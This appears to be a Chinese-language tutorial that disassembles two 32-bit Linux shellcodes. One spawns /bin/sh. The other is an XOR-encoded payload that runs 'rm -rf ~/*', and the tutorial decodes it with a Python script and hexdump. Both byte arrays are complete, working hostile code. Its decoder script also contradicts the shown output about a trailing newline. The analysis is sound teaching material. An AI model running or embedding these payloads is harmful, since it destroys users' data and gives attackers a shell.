下面,我们将分析几个已有的shellcode的功能,通过分析,了解shellcode分析的技巧。
第一个shellcode代码如下:
/*
 * Shellcode 1: execve("/bin/sh", argv, NULL) on 32-bit Linux via int 0x80
 * (eax = 0xb).  Layout, taken from the ndisasm listing below:
 *   0x00 jmp short 0x19       ; skip over the body to the call
 *   0x02 pop esi              ; esi = return address pushed by the call = 0x1e,
 *                             ;   i.e. the address of the string
 *   0x03 mov [esi+0x8],esi    ; argv[0] = &"/bin/sh"
 *   0x06 xor eax,eax
 *   0x08 mov [esi+0x7],al     ; overwrite the 'X' placeholder with a NUL
 *   0x0b mov [esi+0xc],eax    ; argv[1] = NULL
 *   0x0e mov al,0xb           ; SYS_execve
 *   0x10 mov ebx,esi          ; filename
 *   0x12 lea ecx,[esi+0x8]    ; argv
 *   0x15 xor edx,edx          ; envp = NULL
 *   0x17 int 0x80
 *   0x19 call 0x2             ; pushes 0x1e and jumps back to the pop
 *   0x1e "/bin/shX"           ; DATA, not code: ndisasm shows it as das/bound/jnc/pop
 *
 * NOTE(review): the stub patches its own string area ([esi+0x7] .. [esi+0xf]),
 * so it only works from memory that is writable AND executable, and this array
 * must not be made const.  esi+0x8 .. esi+0xf are array offsets 38..45; this
 * literal occupies offsets 0..37 plus the implicit NUL at 38, so when executed
 * in place the argv stores run 7 bytes past the end of the array.  Embed it in
 * a larger buffer when building a test harness around it.
 */
static char shellcode[]=
"\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89"
"\xf3\x8d\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e"
"\x2f\x73\x68\x58";
使用ndisasm反汇编(-u 表示按 32 位模式解码),结果如下:
root@linux:~/pentest# echo -ne "\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58" | ndisasm -u -
00000000 EB17 jmp short 0x19
00000002 5E pop esi
00000003 897608 mov [esi+0x8],esi
00000006 31C0 xor eax,eax
00000008 884607 mov [esi+0x7],al
0000000B 89460C mov [esi+0xc],eax
0000000E B00B mov al,0xb
00000010 89F3 mov ebx,esi
00000012 8D4E08 lea ecx,[esi+0x8]
00000015 31D2 xor edx,edx
00000017 CD80 int 0x80
00000019 E8E4FFFFFF call dword 0x2
0000001E 2F das
0000001F 62696E bound ebp,[ecx+0x6e]
00000022 2F das
00000023 7368 jnc 0x8d
00000025 58 pop eax
root@linux:~/pentest#
可以看出,这是一个执行“/bin/sh”的shellcode:它通过 jmp/call/pop 取得字符串地址(esi 指向偏移 0x1e 处的 “/bin/shX”),用 `mov [esi+0x7],al` 把占位字符 ‘X’ 改写为 NUL,在字符串后面构造 argv(`mov [esi+0x8],esi` 使 argv[0] 指向 “/bin/sh”,`mov [esi+0xc],eax` 使 argv[1] 为 NULL),最后以 eax=0xb、ebx=文件名、ecx=argv、edx=NULL 执行 int 0x80,即 execve("/bin/sh", argv, NULL)。注意偏移 0x1e 之后的 das、bound、jnc 等“指令”并不是代码,而是字符串数据被 ndisasm 线性反汇编的结果;另外该 shellcode 会改写自身所在的内存,因此只能放在既可写又可执行的内存中运行。
第二个shellcode代码如下:
/*
 * Shellcode 2: a self-decoding stub followed by a 0x4b (75)-byte XOR-encoded
 * payload.  The first 0x17 bytes, from the ndisasm listing below:
 *   0x00 jmp short 0x12
 *   0x02 pop esi              ; esi = 0x17, start of the encoded payload
 *   0x03 xor ecx,ecx
 *   0x05 mov cl,0x4b          ; 75 bytes to decode
 *   0x07 mov al,0xff          ; initial key
 *   0x09 xor [esi],al         ; loop: payload[i] ^= key
 *   0x0b dec al               ;       key--  (so byte i is XORed with 0xff - i)
 *   0x0d inc esi
 *   0x0e loop 0x9
 *   0x10 jmp short 0x17       ; run the decoded payload
 *   0x12 call 0x2             ; pushes 0x17 and returns to the pop
 *   0x17 ...                  ; encoded data; ndisasm output from here on is meaningless
 *
 * Decoded (see decode.py and the hexdump below) the payload is
 *   execve("/bin/sh", {"sh", "-c", "rm -rf ~/* 2>/dev/null", NULL}, NULL)
 * followed by exit().  WARNING: this is destructive -- it deletes everything
 * under the current user's home directory.  Analyze it statically or in a
 * throw-away VM; never execute it on a machine you care about.  Like
 * shellcode 1 the stub rewrites itself, so it needs writable + executable
 * memory and this array must not be const.
 */
char shellcode2[] =
"\xeb\x10\x5e\x31\xc9\xb1\x4b\xb0\xff\x30\x06\xfe\xc8\x46\xe2\xf9"
"\xeb\x05\xe8\xeb\xff\xff\xff\x17\xdb\xfd\xfc\xfb\xd5\x9b\x91\x99"
"\xd9\x86\x9c\xf3\x81\x99\xf0\xc2\x8d\xed\x9e\x86\xca\xc4\x9a\x81"
"\xc6\x9b\xcb\xc9\xc2\xd3\xde\xf0\xba\xb8\xaa\xf4\xb4\xac\xb4\xbb"
"\xd6\x88\xe5\x13\x82\x5c\x8d\xc1\x9d\x40\x91\xc0\x99\x44\x95\xcf"
"\x95\x4c\x2f\x4a\x23\xf0\x12\x0f\xb5\x70\x3c\x32\x79\x88\x78\xf7"
"\x7b\x35";
下面使用ndisasm反汇编,结果如下:
root@linux:~/pentest# echo -ne
"\xeb\x10\x5e\x31\xc9\xb1\x4b\xb0\xff\x30\x06\xfe\xc8\x46\xe2\xf9\xeb\x05\xe8\xeb\xff\xff\xff\x17\xdb\xfd\xfc\xfb\xd5\x9b\x91\x99\xd9\x86\x9c\xf3\x81\x99\xf0\xc2\x8d\xed\x9e\x86\xca\xc4\x9a\x81\xc6\x9b\xcb\xc9\xc2\xd3\xde\xf0\xba\xb8\xaa\xf4\xb4\xac\xb4\xbb\xd6\x88\xe5\x13\x82\x5c\x8d\xc1\x9d\x40\x91\xc0\x99\x44\x95\xcf\x95\x4c\x2f\x4a\x23\xf0\x12\x0f\xb5\x70\x3c\x32\x79\x88\x78\xf7\x7b\x35" | ndisasm -u -
00000000 EB10 jmp short 0x12
00000002 5E pop esi
00000003 31C9 xor ecx,ecx
00000005 B14B mov cl,0x4b
00000007 B0FF mov al,0xff
00000009 3006 xor [esi],al
0000000B FEC8 dec al
0000000D 46 inc esi
0000000E E2F9 loop 0x9
00000010 EB05 jmp short 0x17
00000012 E8EBFFFFFF call dword 0x2
00000017 17 pop ss
00000018 DB db 0xdb
00000019 FD std
0000001A FC cld
0000001B FB sti
0000001C D59B aad 0x9b
0000001E 91 xchg eax,ecx
0000001F 99 cdq
00000020 D9869CF38199 fld dword [esi-0x667e0c64]
00000026 F0C28DED lock ret 0xed8d
0000002A 9E sahf
0000002B 86CA xchg cl,dl
0000002D C49A81C69BCB les ebx,[edx-0x3464397f]
00000033 C9 leave
00000034 C2D3DE ret 0xded3
00000037 F0BAB8AAF4B4 lock mov edx,0xb4f4aab8
0000003D AC lodsb
0000003E B4BB mov ah,0xbb
00000040 D6 salc
00000041 88E5 mov ch,ah
00000043 13825C8DC19D adc eax,[edx-0x623e72a4]
00000049 40 inc eax
0000004A 91 xchg eax,ecx
0000004B C0994495CF954C rcr byte [ecx-0x6a306abc],0x4c
00000052 2F das
00000053 4A dec edx
00000054 23F0 and esi,eax
00000056 120F adc cl,[edi]
00000058 B570 mov ch,0x70
0000005A 3C32 cmp al,0x32
0000005C 7988 jns 0xffffffe6
0000005E 78F7 js 0x57
00000060 7B35 jpo 0x97
root@linux:~/pentest#
从上面的反汇编可以看出,偏移 0x17 之前是一段解码器:call/pop 使 esi 指向 0x17 处的载荷,ecx=0x4b(75 字节)是长度,al 从 0xff 开始,每处理一个字节就执行 `xor [esi],al` 再 `dec al`,也就是第 i 个载荷字节与 (0xff - i) 异或;解码完成后 `jmp short 0x17` 执行解出的代码。0x17 之后的反汇编结果没有意义,因为那是尚未解码的数据。接下来,我们用一个 python 脚本复现这个解码过程,并用 hexdump 查看结果。
root@linux:~/pentest# cat decode.py
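#!/usr/bin/env python
"""Decode the self-decrypting payload of shellcode2.

The 0x17-byte decoder stub (jmp/call/pop to get the payload address, then
``mov cl,0x4b; mov al,0xff; xor [esi],al; dec al; inc esi; loop``) XORs each
payload byte with a key that starts at 0xff and decrements once per byte,
i.e. ``payload[i] ^= (0xff - i)``.  This script applies the same transform
so the plaintext can be inspected with hexdump / ndisasm.

Fixes versus the original one-liner:
  * the decoded bytes are written to stdout with NO trailing newline -- the
    old ``print`` statement appended a 0x0a byte that then appeared as a
    spurious ``db 0x0a`` at the end of the ndisasm listing;
  * the code runs unchanged on Python 2 and Python 3 (byte literals,
    ``bytearray`` arithmetic, binary-safe stdout);
  * the offset and key seed are named so the script can be reused on other
    stubs of the same family.
"""
import sys

# shellcode2 verbatim (decoder stub + encoded payload).
sc = (b"\xeb\x10\x5e\x31\xc9\xb1\x4b\xb0\xff\x30\x06\xfe\xc8\x46\xe2\xf9"
      b"\xeb\x05\xe8\xeb\xff\xff\xff\x17\xdb\xfd\xfc\xfb\xd5\x9b\x91\x99"
      b"\xd9\x86\x9c\xf3\x81\x99\xf0\xc2\x8d\xed\x9e\x86\xca\xc4\x9a\x81"
      b"\xc6\x9b\xcb\xc9\xc2\xd3\xde\xf0\xba\xb8\xaa\xf4\xb4\xac\xb4\xbb"
      b"\xd6\x88\xe5\x13\x82\x5c\x8d\xc1\x9d\x40\x91\xc0\x99\x44\x95\xcf"
      b"\x95\x4c\x2f\x4a\x23\xf0\x12\x0f\xb5\x70\x3c\x32\x79\x88\x78\xf7"
      b"\x7b\x35")

PAYLOAD_OFFSET = 0x17  # where the stub's ``call 0x2`` lands: first encoded byte
KEY_SEED = 0xff        # initial value of ``al`` in the decoder loop


def decode(blob, start=PAYLOAD_OFFSET, key=KEY_SEED):
    """Return the XOR-decoded bytes of ``blob[start:]``.

    Byte ``i`` of the slice is XORed with ``(key - i) & 0xff``, mirroring the
    stub's ``xor [esi],al; dec al``.  The ``& 0xff`` is the 8-bit wrap of
    ``dec al``; it never triggers for this 75-byte payload but keeps the model
    faithful for longer ones.  Accepts ``bytes``/``bytearray`` (or a Python 2
    ``str``) and always returns ``bytes``.  An empty slice yields ``b""``.
    """
    data = bytearray(blob[start:])
    return bytes(bytearray((b ^ ((key - i) & 0xff)) for i, b in enumerate(data)))


if __name__ == "__main__":
    # Binary-safe write on both Python 2 (sys.stdout) and 3 (sys.stdout.buffer);
    # no newline is appended, so the output is exactly the 0x4b payload bytes.
    out = getattr(sys.stdout, "buffer", sys.stdout)
    out.write(decode(sc))
    out.flush()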
root@linux:~/pentest# ./decode.py | hexdump -C
00000000 e8 25 00 00 00 2f 62 69 6e 2f 73 68 00 73 68 00 |.%.../bin/sh.sh.|
00000010 2d 63 00 72 6d 20 2d 72 66 20 7e 2f 2a 20 32 3e |-c.rm -rf ~/* 2>|
00000020 2f 64 65 76 2f 6e 75 6c 6c 00 5d 31 c0 50 8d 5d |/dev/null.]1.P.]|
00000030 0e 53 8d 5d 0b 53 8d 5d 08 53 89 eb 89 e1 31 d2 |.S.].S.].S....1.|
00000040 b0 0b cd 80 89 c3 31 c0 40 cd 80 0a |......1.@...|
0000004c
root@linux:~/pentest#
可以看到“/bin/sh”“sh”“-c”“rm -rf ~/* 2>/dev/null”几个字符串——它们是 execve 的参数,而不是指令;末尾的 0a 是 python 的 print 输出的换行符,并不属于 shellcode(真实载荷长度为 0x4b 字节)。这是一个破坏性载荷:它会删除当前用户主目录下的全部文件,请务必只做静态分析或在一次性虚拟机中运行。接下来我们使用 ndisasm 分析。注意偏移 0x2a 之前全是字符串数据,真正的代码从 0x2a 开始:`pop ebp` 取得字符串地址,依次把 “rm -rf ...”(ebp+0xe)、“-c”(ebp+0xb)、“sh”(ebp+0x8) 的地址压栈构成以 NULL 结尾的 argv,然后以 eax=0xb 调用 execve("/bin/sh", argv, NULL),最后用 eax=1 调用 exit。默认的线性反汇编在 0x29 处把字符串末尾的 00 和随后的 5d 31 拼成了错误的指令 `add [ebp+0x31],bl`,可以用 `ndisasm -u -e 0x2a -` 跳过数据部分(或用 `-s 0x2a` 在该处重新同步)得到正确的反汇编:
root@linux:~/pentest# ./decode.py | ndisasm -u -
00000000 E825000000 call dword 0x2a
00000005 2F das
00000006 62696E bound ebp,[ecx+0x6e]
00000009 2F das
0000000A 7368 jnc 0x74
0000000C 007368 add [ebx+0x68],dh
0000000F 002D6300726D add [dword 0x6d720063],ch
00000015 202D7266207E and [dword 0x7e206672],ch
0000001B 2F das
0000001C 2A20 sub ah,[eax]
0000001E 323E xor bh,[esi]
00000020 2F das
00000021 6465762F gs jna 0x54
00000025 6E outsb
00000026 756C jnz 0x94
00000028 6C insb
00000029 005D31 add [ebp+0x31],bl
0000002C C0508D5D rcl byte [eax-0x73],0x5d
00000030 0E push cs
00000031 53 push ebx
00000032 8D5D0B lea ebx,[ebp+0xb]
00000035 53 push ebx
00000036 8D5D08 lea ebx,[ebp+0x8]
00000039 53 push ebx
0000003A 89EB mov ebx,ebp
0000003C 89E1 mov ecx,esp
0000003E 31D2 xor edx,edx
00000040 B00B mov al,0xb
00000042 CD80 int 0x80
00000044 89C3 mov ebx,eax
00000046 31C0 xor eax,eax
00000048 40 inc eax
00000049 CD80 int 0x80
0000004B 0A db 0x0a
root@linux:~/pentest#